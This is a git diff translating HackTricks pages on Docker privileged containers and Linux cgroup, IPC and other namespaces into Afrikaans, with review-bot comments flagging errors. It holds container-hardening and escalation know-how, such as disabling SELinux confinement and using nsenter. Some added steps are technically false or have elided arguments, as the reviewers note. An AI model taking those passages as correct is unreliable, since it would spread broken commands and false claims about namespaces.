{% content-ref url="../selinux.md" %} [selinux.md](../selinux.md) {% endcontent-ref %} - ```bash # You can manually disable selinux in docker with --security-opt label:disable ``` - -## What Doesn't Affect +## Wat nie beïnvloed word nie ### Namespaces -Namespaces are **NOT affected** by the `--privileged` flag. Even though they don't have the security constraints enabled, they **do not see all of the processes on the system or the host network, for example**. Users can disable individual namespaces by using the **`--pid=host`, `--net=host`, `--ipc=host`, `--uts=host`** container engines flags. +Namespaces word **NIET beïnvloed** deur die `--privileged` vlag. Alhoewel hulle nie die sekuriteitsbeperkings geaktiveer het nie, **sien hulle nie al die prosesse op die stelsel of die gasheer-netwerk nie, byvoorbeeld**. Gebruikers kan individuele namespaces deaktiveer deur die **`--pid=host`, `--net=host`, `--ipc=host`, `--uts=host`** kontainer-enjin vlae te gebruik. {% tabs %} -{% tab title="Inside default privileged container" %} +{% tab title="Binne die standaard bevoorregte houer" %} ```bash # docker run --rm --privileged -it alpine sh ps -ef PID USER TIME COMMAND - 1 root 0:00 sh - 18 root 0:00 ps -ef +1 root 0:00 sh +18 root 0:00 ps -ef ``` {% endtab %} -{% tab title="Inside --pid=host Container" %} +{% tab title="Binne --pid=host Houer" %} ```bash # docker run --rm --privileged --pid=host -it alpine sh ps -ef PID USER TIME COMMAND - 1 root 0:03 /sbin/init - 2 root 0:00 [kthreadd] - 3 root 0:00 [rcu_gp]ount | grep /proc.*tmpfs +1 root 0:03 /sbin/init +2 root 0:00 [kthreadd] +3 root 0:00 [rcu_gp]ount | grep /proc.*tmpfs [...] ``` {% endtab %} {% endtabs %} -### User namespace +### Gebruikersnaamruimte -**By default, container engines don't utilize user namespaces, except for rootless containers**, which require them for file system mounting and using multiple UIDs. 
User namespaces, integral for rootless containers, cannot be disabled and significantly enhance security by restricting privileges. +**Standaard maak container-engines geen gebruik van gebruikersnaamruimtes, behalve voor rootless containers**, die ze nodig hebben voor het koppelen van bestandssystemen en het gebruik van meerdere UID's. Gebruikersnaamruimtes, die essentieel zijn voor rootless containers, kunnen niet worden uitgeschakeld en verbeteren de beveiliging aanzienlijk door privileges te beperken. -## References +## Verwysings * [https://www.redhat.com/sysadmin/privileged-flag-container-engines](https://www.redhat.com/sysadmin/privileged-flag-container-engines)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
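Review bot: the "Gebruikersnaamruimte" paragraph in this hunk is translated into Dutch, not Afrikaans ("geen gebruik van gebruikersnaamruimtes, behalve voor rootless containers, die ze nodig hebben voor het koppelen van bestandssystemen", "kunnen niet worden uitgeschakeld en verbeteren de beveiliging aanzienlijk"); it needs re-translating before merge, and "Namespaces word **NIET beïnvloed**" has the same problem (Afrikaans negation is "word NIE beïnvloed NIE"). The same hunk also edits quoted program output inside the `ps -ef` code blocks: the leading spaces of the PID column were stripped (`- 1 root 0:00 sh` became `+1 root 0:00 sh`, likewise `/sbin/init`, `[kthreadd]`), which changes the captured output for no reason; restore the original lines. Terminology is inconsistent within the file ("houermotor" for container engine in the SELinux paragraph versus "houer-enjin" elsewhere, "kontainer-enjin vlae" in the Namespaces paragraph versus "houer" everywhere else). Not part of this change, but since the file is being touched: the context line `# You can manually disable seccomp in docker with --security-opt apparmor=unconfined` under AppArmor should say AppArmor, not seccomp.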
diff --git a/linux-hardening/privilege-escalation/docker-security/namespaces/README.md b/linux-hardening/privilege-escalation/docker-security/namespaces/README.md index 79ed96379..bea1eec3b 100644 --- a/linux-hardening/privilege-escalation/docker-security/namespaces/README.md +++ b/linux-hardening/privilege-escalation/docker-security/namespaces/README.md @@ -2,61 +2,61 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-### **PID namespace** +### **PID-namespace** {% content-ref url="pid-namespace.md" %} [pid-namespace.md](pid-namespace.md) {% endcontent-ref %} -### **Mount namespace** +### **Mount-namespace** {% content-ref url="mount-namespace.md" %} [mount-namespace.md](mount-namespace.md) {% endcontent-ref %} -### **Network namespace** +### **Netwerk-namespace** {% content-ref url="network-namespace.md" %} [network-namespace.md](network-namespace.md) {% endcontent-ref %} -### **IPC Namespace** +### **IPC-namespace** {% content-ref url="ipc-namespace.md" %} [ipc-namespace.md](ipc-namespace.md) {% endcontent-ref %} -### **UTS namespace** +### **UTS-namespace** {% content-ref url="uts-namespace.md" %} [uts-namespace.md](uts-namespace.md) {% endcontent-ref %} -### Time Namespace +### Tyd-namespace {% content-ref url="time-namespace.md" %} [time-namespace.md](time-namespace.md) {% endcontent-ref %} -### User namespace +### Gebruikers-namespace {% content-ref url="user-namespace.md" %} [user-namespace.md](user-namespace.md) {% endcontent-ref %} -### CGroup Namespace +### CGroup-namespace {% content-ref url="cgroup-namespace.md" %} [cgroup-namespace.md](cgroup-namespace.md) @@ -64,14 +64,14 @@ Other ways to support HackTricks:
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
diff --git a/linux-hardening/privilege-escalation/docker-security/namespaces/cgroup-namespace.md b/linux-hardening/privilege-escalation/docker-security/namespaces/cgroup-namespace.md index 1d39d58c6..f909789bc 100644 --- a/linux-hardening/privilege-escalation/docker-security/namespaces/cgroup-namespace.md +++ b/linux-hardening/privilege-escalation/docker-security/namespaces/cgroup-namespace.md @@ -1,85 +1,105 @@ -# CGroup Namespace +# CGroup-namespace
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PRs in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Basic Information +## Basiese Inligting -A cgroup namespace is a Linux kernel feature that provides **isolation of cgroup hierarchies for processes running within a namespace**. Cgroups, short for **control groups**, are a kernel feature that allows organizing processes into hierarchical groups to manage and enforce **limits on system resources** like CPU, memory, and I/O. +'n Cgroup-namespace is 'n Linux-kernelkenmerk wat **afsondering van cgroup-hierargieë vir prosesse wat binne 'n namespace loop, bied**. Cgroups, afkorting vir **beheergroepe**, is 'n kernelkenmerk wat dit moontlik maak om prosesse in hiërargiese groepe te organiseer om **grense op stelselhulpbronne** soos CPU, geheue en I/O te bestuur en af te dwing. -While cgroup namespaces are not a separate namespace type like the others we discussed earlier (PID, mount, network, etc.), they are related to the concept of namespace isolation. **Cgroup namespaces virtualize the view of the cgroup hierarchy**, so that processes running within a cgroup namespace have a different view of the hierarchy compared to processes running in the host or other namespaces. +Alhoewel cgroup-namespaces nie 'n aparte tipe namespace is soos die ander wat ons vroeër bespreek het (PID, berg, netwerk, ens.), is hulle verwant aan die konsep van namespace-afsondering. **Cgroup-namespaces virtualiseer die siening van die cgroup-hierargie**, sodat prosesse wat binne 'n cgroup-namespace loop, 'n ander siening van die hierargie het in vergelyking met prosesse wat in die gasheer of ander namespaces loop. -### How it works: +### Hoe dit werk: -1. When a new cgroup namespace is created, **it starts with a view of the cgroup hierarchy based on the cgroup of the creating process**. This means that processes running in the new cgroup namespace will only see a subset of the entire cgroup hierarchy, limited to the cgroup subtree rooted at the creating process's cgroup. -2. 
Processes within a cgroup namespace will **see their own cgroup as the root of the hierarchy**. This means that, from the perspective of processes inside the namespace, their own cgroup appears as the root, and they cannot see or access cgroups outside of their own subtree. -3. Cgroup namespaces do not directly provide isolation of resources; **they only provide isolation of the cgroup hierarchy view**. **Resource control and isolation are still enforced by the cgroup** subsystems (e.g., cpu, memory, etc.) themselves. +1. Wanneer 'n nuwe cgroup-namespace geskep word, **begin dit met 'n siening van die cgroup-hierargie gebaseer op die cgroup van die skeppende proses**. Dit beteken dat prosesse wat in die nuwe cgroup-namespace loop, slegs 'n subset van die volledige cgroup-hierargie sal sien, beperk tot die cgroup-subboom wat wortel by die skeppende proses se cgroup. +2. Prosesse binne 'n cgroup-namespace sal **hul eie cgroup as die wortel van die hierargie sien**. Dit beteken dat, vanuit die perspektief van prosesse binne die namespace, hul eie cgroup as die wortel voorkom, en hulle kan nie cgroups buite hul eie subboom sien of toegang daartoe verkry nie. +3. Cgroup-namespaces bied nie direkte afsondering van hulpbronne nie; **hulle bied slegs afsondering van die siening van die cgroup-hierargie**. **Hulpbronbeheer en afsondering word steeds afgedwing deur die cgroup-subsisteme (bv. cpu, geheue, ens.) self. -For more information about CGroups check: +Vir meer inligting oor CGroups, kyk na: {% content-ref url="../cgroups.md" %} [cgroups.md](../cgroups.md) {% endcontent-ref %} -## Lab: +## Laboratorium: -### Create different Namespaces +### Skep verskillende Namespaces #### CLI - ```bash sudo unshare -C [--mount-proc] /bin/bash ``` - -By mounting a new instance of the `/proc` filesystem if you use the param `--mount-proc`, you ensure that the new mount namespace has an **accurate and isolated view of the process information specific to that namespace**. 
+Deur 'n nuwe instansie van die `/proc`-lêersisteem te monteer as jy die parameter `--mount-proc` gebruik, verseker jy dat die nuwe berg-namespace 'n **akkurate en geïsoleerde siening van die prosesinligting spesifiek vir daardie namespace** het.
-Error: bash: fork: Cannot allocate memory +Fout: bash: fork: Kan nie geheue toewys nie -When `unshare` is executed without the `-f` option, an error is encountered due to the way Linux handles new PID (Process ID) namespaces. The key details and the solution are outlined below: +Wanneer `unshare` uitgevoer word sonder die `-f`-opsie, word 'n fout aangetref as gevolg van die manier waarop Linux nuwe PID (Proses-ID) namespaces hanteer. Die sleutelbesonderhede en die oplossing word hieronder uiteengesit: -1. **Problem Explanation**: - - The Linux kernel allows a process to create new namespaces using the `unshare` system call. However, the process that initiates the creation of a new PID namespace (referred to as the "unshare" process) does not enter the new namespace; only its child processes do. - - Running `%unshare -p /bin/bash%` starts `/bin/bash` in the same process as `unshare`. Consequently, `/bin/bash` and its child processes are in the original PID namespace. - - The first child process of `/bin/bash` in the new namespace becomes PID 1. When this process exits, it triggers the cleanup of the namespace if there are no other processes, as PID 1 has the special role of adopting orphan processes. The Linux kernel will then disable PID allocation in that namespace. +1. **Probleemverduideliking**: +- Die Linux-kernel maak dit moontlik vir 'n proses om nuwe namespaces te skep deur die `unshare`-sisteemaanroep te gebruik. Die proses wat die skepping van 'n nuwe PID-namespace inisieer (bekend as die "unshare"-proses) betree egter nie die nuwe namespace nie; slegs sy kinderprosesse doen dit. +- Die uitvoering van `%unshare -p /bin/bash%` begin `/bin/bash` in dieselfde proses as `unshare`. Gevolglik is `/bin/bash` en sy kinderprosesse in die oorspronklike PID-namespace. +- Die eerste kinderproses van `/bin/bash` in die nuwe namespace word PID 1. 
Wanneer hierdie proses afsluit, veroorsaak dit die skoonmaak van die namespace as daar geen ander prosesse is nie, aangesien PID 1 die spesiale rol het om weeskindprosesse aan te neem. Die Linux-kernel sal dan PID-toekenning in daardie namespace deaktiveer. -2. **Consequence**: - - The exit of PID 1 in a new namespace leads to the cleaning of the `PIDNS_HASH_ADDING` flag. This results in the `alloc_pid` function failing to allocate a new PID when creating a new process, producing the "Cannot allocate memory" error. +2. **Gevolg**: +- Die afsluiting van PID 1 in 'n nuwe namespace lei tot die skoonmaak van die `PIDNS_HASH_ADDING`-vlag. Dit veroorsaak dat die `alloc_pid`-funksie nie 'n nuwe PID kan toeken by die skep van 'n nuwe proses nie, wat die "Kan nie geheue toewys nie" -fout veroorsaak. -3. **Solution**: - - The issue can be resolved by using the `-f` option with `unshare`. This option makes `unshare` fork a new process after creating the new PID namespace. - - Executing `%unshare -fp /bin/bash%` ensures that the `unshare` command itself becomes PID 1 in the new namespace. `/bin/bash` and its child processes are then safely contained within this new namespace, preventing the premature exit of PID 1 and allowing normal PID allocation. +3. **Oplossing**: +- Die probleem kan opgelos word deur die `-f`-opsie saam met `unshare` te gebruik. Hierdie opsie maak `unshare` 'n nuwe proses na die skepping van die nuwe PID-namespace. +- Deur `%unshare -fp /bin/bash%` uit te voer, verseker jy dat die `unshare`-opdrag self PID 1 in die nuwe namespace word. `/bin/bash` en sy kinderprosesse word dan veilig binne hierdie nuwe namespace gehou, wat die voortydige afsluiting van PID 1 voorkom en normale PID-toekenning moontlik maak. -By ensuring that `unshare` runs with the `-f` flag, the new PID namespace is correctly maintained, allowing `/bin/bash` and its sub-processes to operate without encountering the memory allocation error. 
+Deur te verseker dat `unshare` met die `-f`-vlag uitgevoer word, word die nuwe PID-namespace korrek onderhou, sodat `/bin/bash` en sy subprosesse kan werk sonder om die geheue-toewysingsfout te ondervind.
#### Docker - ```bash docker run -ti --name ubuntu1 -v /usr:/ubuntu1 ubuntu bash ``` +### Kyk watter namespace jou proses is -### Check which namespace is your process in +Om te bepaal in watter namespace jou proses is, kan jy die volgende opdrag gebruik: +```bash +cat /proc/$$/cgroup +``` + +Hierdie opdrag sal die inhoud van die `cgroup`-lêer vir jou huidige proses (`$$`) vertoon. Die `cgroup`-lêer bevat inligting oor die groepe waaraan jou proses behoort, insluitend die namespace-inligting. + +As jy die uitset van hierdie opdrag sien, sal jy 'n pad sien wat die woord "namespace" bevat. Byvoorbeeld: + +``` +11:memory:/user.slice/user-1000.slice/session-1.scope +10:devices:/user.slice/user-1000.slice/session-1.scope +9:pids:/user.slice/user-1000.slice/session-1.scope +8:cpu,cpuacct:/user.slice/user-1000.slice/session-1.scope +7:net_cls,net_prio:/user.slice/user-1000.slice/session-1.scope +6:freezer:/user.slice/user-1000.slice/session-1.scope +5:perf_event:/user.slice/user-1000.slice/session-1.scope +4:blkio:/user.slice/user-1000.slice/session-1.scope +3:rdma:/ +2:cpuset:/user.slice/user-1000.slice/session-1.scope +1:name=systemd:/user.slice/user-1000.slice/session-1.scope +``` + +In hierdie voorbeeld is die proses in die `session-1.scope`-namespace. ```bash ls -l /proc/self/ns/cgroup lrwxrwxrwx 1 root root 0 Apr 4 21:19 /proc/self/ns/cgroup -> 'cgroup:[4026531835]' ``` - -### Find all CGroup namespaces +### Vind alle CGroup-ruimtes {% code overflow="wrap" %} ```bash 
@@ -89,27 +109,41 @@ sudo find /proc -maxdepth 3 -type l -name cgroup -exec ls -l {} \; 2>/dev/null ``` {% endcode %} -### Enter inside an CGroup namespace +### Betree 'n CGroup-namespace +Om toegang te verkry tot 'n CGroup-namespace, kan jy die volgende stappe volg: + +1. Identifiseer die proses ID (PID) van die teikenproses waarin jy wil binnekom. +2. Voer die volgende opdrag uit om die PID van die proses te bekom: + ``` + ps aux | grep + ``` +3. Identifiseer die CGroup-vlak waarin die proses bestaan. Jy kan dit doen deur die inhoud van die `/proc//cgroup`-lêer te ondersoek. +4. Voer die volgende opdrag uit om binne die CGroup-namespace van die proses in te gaan: + ``` + nsenter -t -m + ``` + Hiermee sal jy binne die CGroup-namespace van die proses ingaan en toegang verkry tot die verbandhoudende hulpbronne en beperkings. + +Dit is belangrik om te onthou dat jy oor voldoende bevoorregting moet beskik om hierdie stappe uit te voer. ```bash nsenter -C TARGET_PID --pid /bin/bash ``` +Verder kan jy slegs **toegang verkry tot 'n ander proses-namespace as jy root is**. En jy **kan nie** **toegang kry** tot 'n ander namespace **sonder 'n beskrywer** wat daarna verwys nie (soos `/proc/self/ns/cgroup`). -Also, you can only **enter in another process namespace if you are root**. And you **cannot** **enter** in other namespace **without a descriptor** pointing to it (like `/proc/self/ns/cgroup`). - -## References +## Verwysings * [https://stackoverflow.com/questions/44666700/unshare-pid-bin-bash-fork-cannot-allocate-memory](https://stackoverflow.com/questions/44666700/unshare-pid-bin-bash-fork-cannot-allocate-memory)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hack-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
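Review bot: this hunk adds content that is not in the English source and is technically wrong, so it should be dropped rather than translated: the new "Kyk watter namespace jou proses is" block with `cat /proc/$$/cgroup` shows cgroup membership, not the cgroup namespace (the original `ls -l /proc/self/ns/cgroup` immediately below is the correct check), and "In hierdie voorbeeld is die proses in die `session-1.scope`-namespace" is false because `session-1.scope` is a cgroup path, not a namespace. The added numbered steps under "Betree 'n CGroup-namespace" have their arguments elided (`ps aux | grep`, `/proc//cgroup`, `nsenter -t -m`) and `-m` selects the mount namespace; the original `nsenter -C TARGET_PID --pid /bin/bash` that follows already covers entering the cgroup namespace. Within the translated text: "berg" for mount ("PID, berg, netwerk, ens." and "berg-namespace") means mountain, and the namespaces README in this same patch already uses "Mount-namespace"; item 3 of "Hoe dit werk" opens `**Hulpbronbeheer en afsondering` without a closing `**`, so the bold runs to the end of the list; the literal error message should stay in English ("Fout: bash: fork: Kan nie geheue toewys nie" and the quoted "Kan nie geheue toewys nie"-fout) so readers can match `bash: fork: Cannot allocate memory` against their own terminal; and "Hierdie opsie maak `unshare` 'n nuwe proses" drops the verb "fork" from "makes `unshare` fork a new process", which is the whole point of the `-f` option.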
diff --git a/linux-hardening/privilege-escalation/docker-security/namespaces/ipc-namespace.md b/linux-hardening/privilege-escalation/docker-security/namespaces/ipc-namespace.md index adb562e89..a06bc7594 100644 --- a/linux-hardening/privilege-escalation/docker-security/namespaces/ipc-namespace.md +++ b/linux-hardening/privilege-escalation/docker-security/namespaces/ipc-namespace.md @@ -1,77 +1,84 @@ -# IPC Namespace +# IPC-namespace
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Basic Information +## Basiese Inligting -An IPC (Inter-Process Communication) namespace is a Linux kernel feature that provides **isolation** of System V IPC objects, such as message queues, shared memory segments, and semaphores. This isolation ensures that processes in **different IPC namespaces cannot directly access or modify each other's IPC objects**, providing an additional layer of security and privacy between process groups. +'n IPC (Inter-Process Communication)-naamruimte is 'n Linux-kernelkenmerk wat **afsondering** van System V IPC-voorwerpe bied, soos boodskaprye, gedeelde geheue-segmente en semafore. Hierdie afsondering verseker dat prosesse in **verskillende IPC-naamruimtes nie direk toegang tot of wysiging van mekaar se IPC-voorwerpe kan hê nie**, wat 'n addisionele laag van veiligheid en privaatheid tussen prosesgroepe bied. -### How it works: +### Hoe dit werk: -1. When a new IPC namespace is created, it starts with a **completely isolated set of System V IPC objects**. This means that processes running in the new IPC namespace cannot access or interfere with the IPC objects in other namespaces or the host system by default. -2. IPC objects created within a namespace are visible and **accessible only to processes within that namespace**. Each IPC object is identified by a unique key within its namespace. Although the key may be identical in different namespaces, the objects themselves are isolated and cannot be accessed across namespaces. -3. Processes can move between namespaces using the `setns()` system call or create new namespaces using the `unshare()` or `clone()` system calls with the `CLONE_NEWIPC` flag. When a process moves to a new namespace or creates one, it will start using the IPC objects associated with that namespace. +1. Wanneer 'n nuwe IPC-naamruimte geskep word, begin dit met 'n **volledig afgesonderde stel System V IPC-voorwerpe**. 
Dit beteken dat prosesse wat in die nuwe IPC-naamruimte loop, nie standaard toegang tot of inmenging met die IPC-voorwerpe in ander naamruimtes of die gasheerstelsel kan hê nie. +2. IPC-voorwerpe wat binne 'n naamruimte geskep word, is slegs sigbaar en **toeganklik vir prosesse binne daardie naamruimte**. Elke IPC-voorwerp word geïdentifiseer deur 'n unieke sleutel binne sy naamruimte. Alhoewel die sleutel dieselfde kan wees in verskillende naamruimtes, is die voorwerpe self afgesonderd en kan nie oor naamruimtes heen toegang verkry nie. +3. Prosesse kan tussen naamruimtes beweeg deur die `setns()`-sisteemaanroep te gebruik of nuwe naamruimtes te skep deur die `unshare()`- of `clone()`-sisteemaanroep met die `CLONE_NEWIPC`-vlag te gebruik. Wanneer 'n proses na 'n nuwe naamruimte beweeg of een skep, begin dit die IPC-voorwerpe wat met daardie naamruimte geassosieer word, gebruik. -## Lab: +## Laboratorium: -### Create different Namespaces +### Skep verskillende Naamruimtes #### CLI - ```bash sudo unshare -i [--mount-proc] /bin/bash ``` - -By mounting a new instance of the `/proc` filesystem if you use the param `--mount-proc`, you ensure that the new mount namespace has an **accurate and isolated view of the process information specific to that namespace**. +Deur 'n nuwe instansie van die `/proc`-lêersisteem te monteer as jy die 